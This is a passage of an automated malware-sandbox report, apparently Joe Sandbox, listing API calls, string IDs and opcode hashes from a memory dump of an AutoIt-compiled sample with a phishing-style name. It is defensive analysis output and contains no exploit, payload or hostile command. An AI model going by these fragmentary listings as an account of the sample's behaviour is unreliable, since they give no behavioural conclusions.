                            • Instruction Fuzzy Hash: ADF0E23100129ABBDB162F90BC0DFCE3F99AF06310F008100FA49214E18BB54591CFD5
                            APIs
                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000BD640
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 000BD653
                            • GetCurrentThreadId.KERNEL32 ref: 000BD65A
                            • AttachThreadInput.USER32(00000000), ref: 000BD661
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                            • String ID:
                            • API String ID: 2710830443-0
                            • Opcode ID: 0b72fbbf5f7e09c61274ce105d7e18c2526b56690542506d01c17645dca9aeef
                            • Instruction ID: 2a29baf75656f7634366d5dee9bad165735663329daf39d6bdcf8a214732fdf3
                            • Opcode Fuzzy Hash: 0b72fbbf5f7e09c61274ce105d7e18c2526b56690542506d01c17645dca9aeef
                            • Instruction Fuzzy Hash: 31E0ED71541228BADB205FA2EC0DFDBBF6CEF557A1F408011B54D95460DEB6D5C0CBA0
                            APIs
                            • GetSysColor.USER32(00000008), ref: 0009B0C5
                            • SetTextColor.GDI32(?,000000FF), ref: 0009B0CF
                            • SetBkMode.GDI32(?,00000001), ref: 0009B0E4
                            • GetStockObject.GDI32(00000005), ref: 0009B0EC
                            • GetWindowDC.USER32(?,00000000), ref: 000FECFA
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 000FED07
                            • GetPixel.GDI32(00000000,?,00000000), ref: 000FED20
                            • GetPixel.GDI32(00000000,00000000,?), ref: 000FED39
                            • GetPixel.GDI32(00000000,?,?), ref: 000FED59
                            • ReleaseDC.USER32(?,00000000), ref: 000FED64
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                            • String ID:
                            • API String ID: 1946975507-0
                            • Opcode ID: ae0d4a8eefce529fac71ca544618a6dc7c55e6362b070ab10c618d8c5c592d5a
                            • Instruction ID: 8f83a539e56955ac90b28a531a64dd57597f973178029543e80c8060fcde843c
                            • Opcode Fuzzy Hash: ae0d4a8eefce529fac71ca544618a6dc7c55e6362b070ab10c618d8c5c592d5a
                            • Instruction Fuzzy Hash: 87E06D31100284AEEF211FB8FC097983F61AB45335F008226FBA9584E2CBB14580DB11
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BC071
                            • UnloadUserProfile.USERENV(?,?), ref: 000BC07D
                            • CloseHandle.KERNEL32(?), ref: 000BC086
                            • CloseHandle.KERNEL32(?), ref: 000BC08E
                              • Part of subcall function 000BB850: GetProcessHeap.KERNEL32(00000000,?,000BB574), ref: 000BB857
                              • Part of subcall function 000BB850: HeapFree.KERNEL32(00000000), ref: 000BB85E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                            • String ID:
                            • API String ID: 146765662-0
                            • Opcode ID: 551d8384cbf42d3108e97012af61a18d95238c0993da5fbbcfc1b26edb82e218
                            • Instruction ID: 8157a4364de900c52b9e7fd9b7bfc566943d38540d05b485139172046e64e195
                            • Opcode Fuzzy Hash: 551d8384cbf42d3108e97012af61a18d95238c0993da5fbbcfc1b26edb82e218
                            • Instruction Fuzzy Hash: 28E0B63610400ABFCB012FE5ED09859FB2AFF993213108225F66581970CFB2A8B1EB90
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: df7428629b4577b16f4815b16198c5d36e8a20e8fb75de9adae7e1483de06d78
                            • Instruction ID: b6388dff12fca93bedd292d7d1d702daa6c9b1bac32a7370f5aaa80e077def29
                            • Opcode Fuzzy Hash: df7428629b4577b16f4815b16198c5d36e8a20e8fb75de9adae7e1483de06d78
                            • Instruction Fuzzy Hash: A7E04FB1500204EFEB105FB0EC48A6D3FB9EB4C350F118405FD8A87611DAB698C19B00
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: 35be4743cbd90c45b998b3b953288c5d0b5dad472ebcb48a13844e5e5e58bd47
                            • Instruction ID: b1c830b5fc5e0f6d15bc25ed56cdbc80c749f247715887ddd62dbae463a03238
                            • Opcode Fuzzy Hash: 35be4743cbd90c45b998b3b953288c5d0b5dad472ebcb48a13844e5e5e58bd47
                            • Instruction Fuzzy Hash: F3E046B1500200EFDF00AFB0EC4866E3FA9EB4C360F118405F98A8B611DBBA99C09B00
                            APIs
                            • __getptd_noexit.LIBCMT ref: 000A4C3E
                              • Part of subcall function 000A86B5: GetLastError.KERNEL32(?,000A0127,000A88A3,000A4673,?,?,000A0127,?,0008125D,00000058,?,?), ref: 000A86B7
                              • Part of subcall function 000A86B5: __calloc_crt.LIBCMT ref: 000A86D8
                              • Part of subcall function 000A86B5: GetCurrentThreadId.KERNEL32 ref: 000A8701
                              • Part of subcall function 000A86B5: SetLastError.KERNEL32(00000000,000A0127,000A88A3,000A4673,?,?,000A0127,?,0008125D,00000058,?,?), ref: 000A8719
                            • CloseHandle.KERNEL32(?,?,000A4C1D), ref: 000A4C52
                            • __freeptd.LIBCMT ref: 000A4C59
                            • ExitThread.KERNEL32 ref: 000A4C61
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                            • String ID:
                            • API String ID: 408300095-0
                            • Opcode ID: 1b93c01bb4220397a1c29fea2f8d2704020a02b6a0c4afe6515bd4e0f6854038
                            • Instruction ID: ced1b3adfc93c69dfbcbfcdf6b4c0d6e65333fd972dcfad5ddbf64224b9ef2d9
                            • Opcode Fuzzy Hash: 1b93c01bb4220397a1c29fea2f8d2704020a02b6a0c4afe6515bd4e0f6854038
                            • Instruction Fuzzy Hash: EAD0A731443A514BD17527E09D0D68D32905F03B35F018314E079454E19FA068414792
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: >$DEFINE
                            • API String ID: 4104443479-1664449232
                            • Opcode ID: 33fa3399901376171375e516a56b59fc8ca65ede16beefa3d650e9ae805c28e0
                            • Instruction ID: fe55606b5d6dee0137793dc61f792b4e36af184c7a30d157fcffe7558ecaffff
                            • Opcode Fuzzy Hash: 33fa3399901376171375e516a56b59fc8ca65ede16beefa3d650e9ae805c28e0
                            • Instruction Fuzzy Hash: 32127C71A0020ADFCF24DF98C4946ADB7B1FF58310F25825AE899AB395D770ED81CB50
                            APIs
                            • OleSetContainedObject.OLE32(?,00000001), ref: 000BECA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ContainedObject
                            • String ID: AutoIt3GUI$Container
                            • API String ID: 3565006973-3941886329
                            • Opcode ID: 8f580872c2468715bf777299a72482a65eaf3fa196b2e5063e468c2a35b7b310
                            • Instruction ID: 2ccd07d4ec2d2c0576d57b05f3f7411fdfac47477d66d2222af728064a57f4e1
                            • Opcode Fuzzy Hash: 8f580872c2468715bf777299a72482a65eaf3fa196b2e5063e468c2a35b7b310
                            • Instruction Fuzzy Hash: 62913674600701AFDB54DF64C884BAABBF9BF49710F24856DE94ADB291DBB0E841CB60
                            APIs
                              • Part of subcall function 00083BCF: _wcscpy.LIBCMT ref: 00083BF2
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • __wcsnicmp.LIBCMT ref: 000CE785
                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 000CE84E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                            • String ID: LPT
                            • API String ID: 3222508074-1350329615
                            • Opcode ID: 7a304c0e0896652e1abf084c8ab3556235e0d9fc0d88519a63fe1a1efbaf933c
                            • Instruction ID: a90e9e04d74ce560ab874f54e153720747bc9f671b4ce62583d99c6934b6c7f5
                            • Opcode Fuzzy Hash: 7a304c0e0896652e1abf084c8ab3556235e0d9fc0d88519a63fe1a1efbaf933c
                            • Instruction Fuzzy Hash: 97616E75A00215AFDB14EB94C895FEEB7F4EF09310F14816DF54AAB291DB70AE44CB50
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00081B83
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00081B9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: GlobalMemorySleepStatus
                            • String ID: @
                            APIs
                              • Part of subcall function 0008417D: __fread_nolock.LIBCMT ref: 0008419B
                            • _wcscmp.LIBCMT ref: 000CCF49
                            • _wcscmp.LIBCMT ref: 000CCF5C
                            Similarity
                            • API ID: _wcscmp$__fread_nolock
                            • String ID: FILE
                            APIs
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 000EA668
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000EA67D
                            Similarity
                            • API ID: MessageSend
                            • String ID: '
                            APIs
                            • DestroyWindow.USER32(?,?,?,?), ref: 000E961B
                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000E9657
                            Similarity
                            • API ID: Window$DestroyMove
                            • String ID: static
                            APIs
                            • _memset.LIBCMT ref: 000C5BE4
                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000C5C1F
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            APIs
                            • __snwprintf.LIBCMT ref: 000D6BDD
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            Similarity
                            • API ID: __snwprintf_memmove
                            • String ID: , $$AUTOITCALLVARIABLE%d
                            APIs
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000E9269
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000E9274
                            Similarity
                            • API ID: MessageSend
                            • String ID: Combobox
                            APIs
                              • Part of subcall function 0009C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009C657
                              • Part of subcall function 0009C619: GetStockObject.GDI32(00000011), ref: 0009C66B
                              • Part of subcall function 0009C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009C675
                            • GetWindowRect.USER32(00000000,?), ref: 000E9775
                            • GetSysColor.USER32(00000012), ref: 000E978F
                            Similarity
                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                            • String ID: static
                            APIs
                            • GetWindowTextLengthW.USER32(00000000), ref: 000E94A6
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000E94B5
                            Similarity
                            • API ID: LengthMessageSendTextWindow
                            • String ID: edit
                            APIs
                            • _memset.LIBCMT ref: 000C5CF3
                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 000C5D12
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            APIs
                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000D544C
                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000D5475
                            Similarity
                            • API ID: Internet$OpenOption
                            • String ID: <local>
                            APIs
                            • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000DACF5
                            • htons.WSOCK32(00000000,?,00000000), ref: 000DAD32
                            Similarity
                            • API ID: htonsinet_addr
                            • String ID: 255.255.255.255
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000BC5E5
                            Similarity
                            • API ID: MessageSend_memmove
                            • String ID: ComboBox$ListBox
                            APIs
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 000BC4E1
                            Similarity
                            • API ID: MessageSend_memmove
                            • String ID: ComboBox$ListBox
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 000BC562
                            Similarity
                            • API ID: MessageSend_memmove
                            • String ID: ComboBox$ListBox
                            APIs
                            Similarity
                            • API ID: ClassName_wcscmp
                            • String ID: #32770
                            • API String ID: 2292705959-463685578
                            • Opcode ID: 6f1ee3f6a727200822859ad26224cbfe8014d49de720623e29bcb96bab48ae58
                            • Instruction ID: c5e95d98b74b8265218815173165cb159cff27ccd4434a2b3e9df493689f008e
                            • Opcode Fuzzy Hash: 6f1ee3f6a727200822859ad26224cbfe8014d49de720623e29bcb96bab48ae58
                            • Instruction Fuzzy Hash: D9E0D13750422527D720DB959C06FD7F7ACE751764F000026F564D3041D770978587D4
                            APIs
                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000BB36B
                              • Part of subcall function 000A2011: _doexit.LIBCMT ref: 000A201B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Message_doexit
                            • String ID: AutoIt$Error allocating memory.
                            • API String ID: 1993061046-4017498283
                            • Opcode ID: ddc821629fd08fc4148192ac36bf0bea03bd0910264bbfcc9ca625e02857b970
                            • Instruction ID: 4249d3867b4d477b38f9de1f85e2891f3b38f453a4e9cb544d550f307a165504
                            • Opcode Fuzzy Hash: ddc821629fd08fc4148192ac36bf0bea03bd0910264bbfcc9ca625e02857b970
                            • Instruction Fuzzy Hash: 2DD0123128832833D21532D87C07FC576884F06B51F114025BF48565C38AE295D04299
                            APIs
                            • GetSystemDirectoryW.KERNEL32(?), ref: 000FBAB8
                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 000FBCAB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: DirectoryFreeLibrarySystem
                            • String ID: WIN_XPe
                            • API String ID: 510247158-3257408948
                            • Opcode ID: 0a9d7dd185395f5e634fda127496f7cfb89180f25c3213a3fadd7a17d321306b
                            • Instruction ID: d72f2d558b14fc8f585719eda72247ef37b666b1043d0c7ee89deab0024f513b
                            • Opcode Fuzzy Hash: 0a9d7dd185395f5e634fda127496f7cfb89180f25c3213a3fadd7a17d321306b
                            • Instruction Fuzzy Hash: 9DE0ED70C0414DEFCB25DBA8DC45AECB7B8BF48300F54C496E222B2551C7719A84EF22
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000E849F
                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000E84B2
                              • Part of subcall function 000C8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C83CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: e7c4810d25a050fe3116d8b85a37ef2ccfecab9b18d5afaf836fcf071d5979b7
                            • Instruction ID: 1ca318a46f5ff3e047770242c3757e3c11b1f4edd7188bb959fe671032e63a69
                            • Opcode Fuzzy Hash: e7c4810d25a050fe3116d8b85a37ef2ccfecab9b18d5afaf836fcf071d5979b7
                            • Instruction Fuzzy Hash: 74D01272384354BBE764A7B0AC4FFD77A54AB14B11F0509297399AA1D1CDF0B940C764
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000E84DF
                            • PostMessageW.USER32(00000000), ref: 000E84E6
                              • Part of subcall function 000C8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C83CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: 92245bbc1b6cd1ca04b4daec51a9fec498cd9a723c3e07c5a8a48c005b661d9f
                            • Instruction ID: e822f00312b50939d84885c254e65333b9c6c97ee8cf54b25db6f440f9ebf874
                            • Opcode Fuzzy Hash: 92245bbc1b6cd1ca04b4daec51a9fec498cd9a723c3e07c5a8a48c005b661d9f
                            • Instruction Fuzzy Hash: BCD02272380300BBF720A3B0AC0FFC77604AB18B00F0008287389AA1C0CDF0B940C328